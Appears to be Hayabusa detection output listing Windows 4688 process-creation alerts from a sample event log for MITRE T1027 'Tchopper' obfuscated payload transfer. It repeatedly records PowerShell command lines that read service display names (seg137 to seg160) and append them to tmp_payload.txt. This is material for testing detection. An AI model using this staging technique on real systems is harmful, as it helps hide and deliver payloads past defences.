Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
